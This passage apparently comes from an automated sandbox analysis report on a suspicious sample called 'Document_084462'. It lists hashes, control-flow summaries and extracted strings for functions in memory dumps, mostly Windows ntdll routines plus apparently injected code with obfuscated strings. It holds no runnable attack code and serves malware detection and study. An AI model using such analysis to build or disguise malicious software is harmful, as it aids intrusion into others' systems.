                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b2eab4b051eaf9b371dfed328af7bb2c2c17ec273ad4bfc3146e89894418c15
                                                                              • Instruction ID: 3385263d1792d1508897c16c7879d470b06acc6b657a44a5bec7205fe2be5e24
                                                                              • Opcode Fuzzy Hash: 5b2eab4b051eaf9b371dfed328af7bb2c2c17ec273ad4bfc3146e89894418c15
                                                                              • Instruction Fuzzy Hash: 7B90026130150013E5407158552C606441597E1301F51D416E0404554DEA258A5A7622
                                                                              Function 37AF2B80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbbb3c50d72b5aeb828b82d61108617d14349b5ee994a31d8d39c8d30bc8d436
                                                                              • Instruction ID: 1a853d5deb123478b6538f3399ee8f9579d1fc908dd718aa1e598dddf7c28be4
                                                                              • Opcode Fuzzy Hash: bbbb3c50d72b5aeb828b82d61108617d14349b5ee994a31d8d39c8d30bc8d436
                                                                              • Instruction Fuzzy Hash: 9290027120150852E50061584518B46041547E0301F51C41BA0114654ED725CA557921
                                                                              Function 37AF2BE0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14b1e7f844917ec99d639e7bbc1bb21b043beab11d87bf867a12cd2698eaafb0
                                                                              • Instruction ID: f2806755efe44d164443d2776f6495f2c46b2806dc93e1e6717bb7bc1d41cea5
                                                                              • Opcode Fuzzy Hash: 14b1e7f844917ec99d639e7bbc1bb21b043beab11d87bf867a12cd2698eaafb0
                                                                              • Instruction Fuzzy Hash: 6B90026160550412E5407158552C706042547D0301F51D416A0014554ED7698B597AA1
                                                                              Function 37AF2B00 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3eca3ef19557d93be0db505cf12142267ce606b8914f347dd94bba77f270e01c
                                                                              • Instruction ID: bb25de0a88b3161412cbb4448b8500875e2b99eefedc9524ea4c65454854c912
                                                                              • Opcode Fuzzy Hash: 3eca3ef19557d93be0db505cf12142267ce606b8914f347dd94bba77f270e01c
                                                                              • Instruction Fuzzy Hash: 8D90027120554852E54071584518A46042547D0305F51C416A0054694EE7358F59BA61
                                                                              Function 37AF2B10 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8f5d08361e30a65d6844d9e48f1f554d92197e7eac434eee5bba7908631d43ab
                                                                              • Instruction ID: f2fb7cb5edc289a56658119b7c15aa4bb82d39546223647ef2823d430a14aaef
                                                                              • Opcode Fuzzy Hash: 8f5d08361e30a65d6844d9e48f1f554d92197e7eac434eee5bba7908631d43ab
                                                                              • Instruction Fuzzy Hash: 3390027120150812E5807158451864A041547D1301F91C41AA0015654EDB258B5D7BA1
                                                                              Function 37AF2AA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fcaffd35e9201d63e15ee595670f3dd7762064aac4f3b6deb02f743821bcb820
                                                                              • Instruction ID: 2dd5e032348a5420c47eb9d5984757b9c3445baa65e92fe03796d793a0533d2b
                                                                              • Opcode Fuzzy Hash: fcaffd35e9201d63e15ee595670f3dd7762064aac4f3b6deb02f743821bcb820
                                                                              • Instruction Fuzzy Hash: 2190027120150812E50461584918686041547D0301F51C416A6014655FE7758A957531
                                                                              Function 37AF2A80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fef54a0f6ace6299d685c25255b535c8cf2113d6894ec59c14456fee0f5b5750
                                                                              • Instruction ID: 524f30bcc68d2a0139380839b54fc5690329df0b93a469899a453d80dae62668
                                                                              • Opcode Fuzzy Hash: fef54a0f6ace6299d685c25255b535c8cf2113d6894ec59c14456fee0f5b5750
                                                                              • Instruction Fuzzy Hash: 599002A120250013550571584528616441A47E0301B51C426E1004590ED6358A957525
                                                                              Function 37AF2AC0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78fdf55c803baef9522a83d611c5194c204bb79e5ce51f1a6bad6227b1b4deb2
                                                                              • Instruction ID: 860eb5361bb36f1c6c4a42fa501d803c1e083d8cc63ef3089765c30b94a003a0
                                                                              • Opcode Fuzzy Hash: 78fdf55c803baef9522a83d611c5194c204bb79e5ce51f1a6bad6227b1b4deb2
                                                                              • Instruction Fuzzy Hash: AC90027160550812E55071584528746041547D0301F51C416A0014654ED7658B597AA1
                                                                              Function 37AF2A10 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6824a0f1092d4a207773c2a4556c132a740e81cc3cd08136aefc6f41d59f4f4
                                                                              • Instruction ID: f66ac26ba5608474e9c26791363ec56afe0f45a70deb6be5e1da54866fa72cb6
                                                                              • Opcode Fuzzy Hash: d6824a0f1092d4a207773c2a4556c132a740e81cc3cd08136aefc6f41d59f4f4
                                                                              • Instruction Fuzzy Hash: CA900265221500121545A558071850B085557D6351391C41AF1406590DD7318A697721
                                                                              Function 37AF29F0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30f435bc2925da25a0ebdf8858d338802ee9299bcb06990978809a7c37fafc82
                                                                              • Instruction ID: 0189e38aee23264545ce42db38290496286934d7f79d4213bc12bddf349038a3
                                                                              • Opcode Fuzzy Hash: 30f435bc2925da25a0ebdf8858d338802ee9299bcb06990978809a7c37fafc82
                                                                              • Instruction Fuzzy Hash: E7900475311500131505F55C071C507045747D5351351C437F1005550DF731CF757531
                                                                              Function 37AF29D0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b11346d309b35354068240b2297bf8da2cc79fcd18c455f528eed7bba39c3ad0
                                                                              • Instruction ID: 7e1d9d462ba7cdde3e79395b5319537108e5c1f066998031988ef1cfa15148fb
                                                                              • Opcode Fuzzy Hash: b11346d309b35354068240b2297bf8da2cc79fcd18c455f528eed7bba39c3ad0
                                                                              • Instruction Fuzzy Hash: DA9002E1201640A25900A2588518B0A491547E0301B51C41BE1044560DD6358A55B535
                                                                              Function 37AF2B20 Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 800d4d923bc40c549c601ed580c2465a76dd4b8396caca4ba5c1d6e7f5c31cca
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 0012DFF9 Relevance: 56.5, Strings: 45, Instructions: 215COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 12dff9-12e1e7 6 12e1e9-12e1f4 5->6 6->6 7 12e1f6-12e211 6->7 8 12e217-12e230 7->8 9 12e2a4-12e2a8 7->9 10 12e238-12e29a 8->10 11 12e2ca-12e2ce 9->11 12 12e2aa-12e2c7 9->12 10->10 13 12e29c-12e29d 10->13 14 12e2d0-12e2ee 11->14 15 12e2f1-12e2f5 11->15 12->11 13->9 14->15 16 12e312-12e32b 15->16 17 12e2f7-12e30f 15->17 17->16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                              • API String ID: 0-3558027158
                                                                              • Opcode ID: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
                                                                              • Instruction ID: abff098c0aaaa2e589e8321f793acb9fca93d96d011372303360b693b68c1716
                                                                              • Opcode Fuzzy Hash: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
                                                                              • Instruction Fuzzy Hash: 4D9150F04482948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89198F85
                                                                              Function 00123C1E Relevance: 18.8, Strings: 15, Instructions: 60COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 778 123c1e-123cfb 779 123d08-123d16 778->779 779->779 780 123d18-123d30 call 1312b8 779->780
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (b~$!!,b$!$&($&"dm$)":>$,?$b$bx~z$c||y$c~{m$m(.$xc}c$xc}m$x~zc${c|d$|t|{
                                                                              • API String ID: 0-2033398785
                                                                              • Opcode ID: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
                                                                              • Instruction ID: 90af036d65f93e018c793fe74761e0e4a83dc3ad6c3a9f0194a30102330b683f
                                                                              • Opcode Fuzzy Hash: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
                                                                              • Instruction Fuzzy Hash: 872155B080830CDBCB19CF84E5827DEBB71FF15704F909259E9496F246C7358254CB89
                                                                              Function 37B8A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1343 37b8a1f0-37b8a269 call 37ac2330 * 2 RtlDebugPrintTimes 1349 37b8a41f-37b8a444 call 37ac24d0 * 2 call 37af4b50 1343->1349 1350 37b8a26f-37b8a27a 1343->1350 1352 37b8a27c-37b8a289 1350->1352 1353 37b8a2a4 1350->1353 1355 37b8a28b-37b8a28d 1352->1355 1356 37b8a28f-37b8a295 1352->1356 1357 37b8a2a8-37b8a2b4 1353->1357 1355->1356 1359 37b8a29b-37b8a2a2 1356->1359 1360 37b8a373-37b8a375 1356->1360 1361 37b8a2c1-37b8a2c3 1357->1361 1359->1357 1362 37b8a39f-37b8a3a1 1360->1362 1363 37b8a2c5-37b8a2c7 1361->1363 1364 37b8a2b6-37b8a2bc 1361->1364 1368 37b8a2d5-37b8a2fd RtlDebugPrintTimes 1362->1368 1369 37b8a3a7-37b8a3b4 1362->1369 1363->1362 1366 37b8a2cc-37b8a2d0 1364->1366 1367 37b8a2be 1364->1367 1371 37b8a3ec-37b8a3ee 1366->1371 1367->1361 1368->1349 1381 37b8a303-37b8a320 RtlDebugPrintTimes 1368->1381 1372 37b8a3da-37b8a3e6 1369->1372 1373 37b8a3b6-37b8a3c3 1369->1373 1371->1362 1378 37b8a3fb-37b8a3fd 1372->1378 1376 37b8a3cb-37b8a3d1 1373->1376 1377 37b8a3c5-37b8a3c9 1373->1377 1382 37b8a4eb-37b8a4ed 1376->1382 1383 37b8a3d7 1376->1383 1377->1376 1379 37b8a3ff-37b8a401 1378->1379 1380 37b8a3f0-37b8a3f6 1378->1380 1386 37b8a403-37b8a409 1379->1386 1384 37b8a3f8 1380->1384 1385 37b8a447-37b8a44b 1380->1385 1381->1349 1391 37b8a326-37b8a34c RtlDebugPrintTimes 1381->1391 1382->1386 1383->1372 1384->1378 1387 37b8a51f-37b8a521 1385->1387 1388 37b8a40b-37b8a41d RtlDebugPrintTimes 1386->1388 1389 37b8a450-37b8a474 RtlDebugPrintTimes 1386->1389 1388->1349 1389->1349 1394 37b8a476-37b8a493 RtlDebugPrintTimes 1389->1394 1391->1349 1396 37b8a352-37b8a354 1391->1396 1394->1349 1401 37b8a495-37b8a4c4 RtlDebugPrintTimes 1394->1401 1398 37b8a356-37b8a363 1396->1398 1399 37b8a377-37b8a38a 1396->1399 1402 37b8a36b-37b8a371 1398->1402 1403 37b8a365-37b8a369 1398->1403 1400 37b8a397-37b8a399 1399->1400 1404 37b8a39b-37b8a39d 1400->1404 1405 37b8a38c-37b8a392 1400->1405 1401->1349 1409 37b8a4ca-37b8a4cc 1401->1409 1402->1360 1402->1399 1403->1402 1404->1362 1406 37b8a3e8-37b8a3ea 1405->1406 1407 37b8a394 1405->1407 1406->1371 1407->1400 1410 37b8a4ce-37b8a4db 1409->1410 1411 37b8a4f2-37b8a505 1409->1411 1412 37b8a4dd-37b8a4e1 1410->1412 1413 37b8a4e3-37b8a4e9 1410->1413 1414 37b8a512-37b8a514 1411->1414 1412->1413 1413->1382 1413->1411 1415 37b8a516 1414->1415 1416 37b8a507-37b8a50d 1414->1416 1415->1379 1417 37b8a51b-37b8a51d 1416->1417 1418 37b8a50f 1416->1418 1417->1387 1418->1414
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: HEAP:
                                                                              • API String ID: 3446177414-2466845122
                                                                              • Opcode ID: 56e4980e93371a052122261b3c5b93451ea58b1359c6732e0dd6cb9c7b017c8e
                                                                              • Instruction ID: 9b1d3621ec68813d559c3b411e6cdeffb2c950f24cdf485d748a40f6b0f8d7a0
                                                                              • Opcode Fuzzy Hash: 56e4980e93371a052122261b3c5b93451ea58b1359c6732e0dd6cb9c7b017c8e
                                                                              • Instruction Fuzzy Hash: 7FA17AB5604351EFEB04CF18C895A2ABBF5FB88360F084529E945EB350EB74EC45CB91
                                                                              Function 37AE7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 37B244AB
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 37B24592
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37B24530
                                                                              • Execute=1, xrefs: 37B2451E
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37B24460
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37B24507
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 37B2454D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: b28aaffdd86a690723c735b44fe50c73d76088859b2eeb02922cd09f5b18ccd9
                                                                              • Instruction ID: 39365648df7ef13794ac8aaf4572943c4c815761cbfe773acf7370383c8c352e
                                                                              • Opcode Fuzzy Hash: b28aaffdd86a690723c735b44fe50c73d76088859b2eeb02922cd09f5b18ccd9
                                                                              • Instruction Fuzzy Hash: 9C510571A013197AFB109AA4DC85FE973BCEF48355F4004ADED29A7580EB74AE41CF62
                                                                              Function 37ACA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B17807
                                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 37B178F3
                                                                              • SsHd, xrefs: 37ACA304
                                                                              • Actx , xrefs: 37B17819, 37B17880
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 37B177DD, 37B17802
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B177E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                              • API String ID: 0-1988757188
                                                                              • Opcode ID: b1634820aed5ca31df884aa15b1ba132e9e1bf4818a66fe409db49b3a5464274
                                                                              • Instruction ID: e6da88b950cf95076760dec7e9f5ed8f840bd4dab9217a9dd8feb8748b3a92a8
                                                                              • Opcode Fuzzy Hash: b1634820aed5ca31df884aa15b1ba132e9e1bf4818a66fe409db49b3a5464274
                                                                              • Instruction Fuzzy Hash: 25E1C0B8604302AFE715CF64C9D472AB7E1BB84364F504A2DED75CB290DB31E985CB82
                                                                              Function 37ACD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B19178
                                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37B19372
                                                                              • GsHd, xrefs: 37ACD794
                                                                              • Actx , xrefs: 37B19315
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 37B1914E, 37B19173
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B19153
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                              • API String ID: 3446177414-2196497285
                                                                              • Opcode ID: ff7583cf9da370107d0d74d94c7a5e66006d869346b513a64153584066dc2741
                                                                              • Instruction ID: 4eff17698633e93d463e49d14394869d371dba9d22b31725208cabf7c6631f37
                                                                              • Opcode Fuzzy Hash: ff7583cf9da370107d0d74d94c7a5e66006d869346b513a64153584066dc2741
                                                                              • Instruction Fuzzy Hash: C5E180B4604382AFE710CF24C980B5AB7F5BF88364F404A6DED65DB281D771E945CB92
                                                                              Function 37AA640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 37AA651C
                                                                                • Part of subcall function 37AA6565: RtlDebugPrintTimes.NTDLL ref: 37AA6614
                                                                                • Part of subcall function 37AA6565: RtlDebugPrintTimes.NTDLL ref: 37AA665F
                                                                              Strings
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 37B097B9
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37B09790
                                                                              • apphelp.dll, xrefs: 37AA6446
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 37B0977C
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B097A0, 37B097C9
                                                                              • LdrpInitShimEngine, xrefs: 37B09783, 37B09796, 37B097BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-204845295
                                                                              • Opcode ID: 9a9301c9307dbe3a014214e70f427d3159a821b91b88cae11dee51a17bc3c6ce
                                                                              • Instruction ID: 7d369212865e9e71eae160140cfd273e3bc20fec9fad8f2b6b22832cd49b8c93
                                                                              • Opcode Fuzzy Hash: 9a9301c9307dbe3a014214e70f427d3159a821b91b88cae11dee51a17bc3c6ce
                                                                              • Instruction Fuzzy Hash: 6451AE712493059BE354DF20C995FABBBF8EB84654F400929F9A497290EB38D904CF93
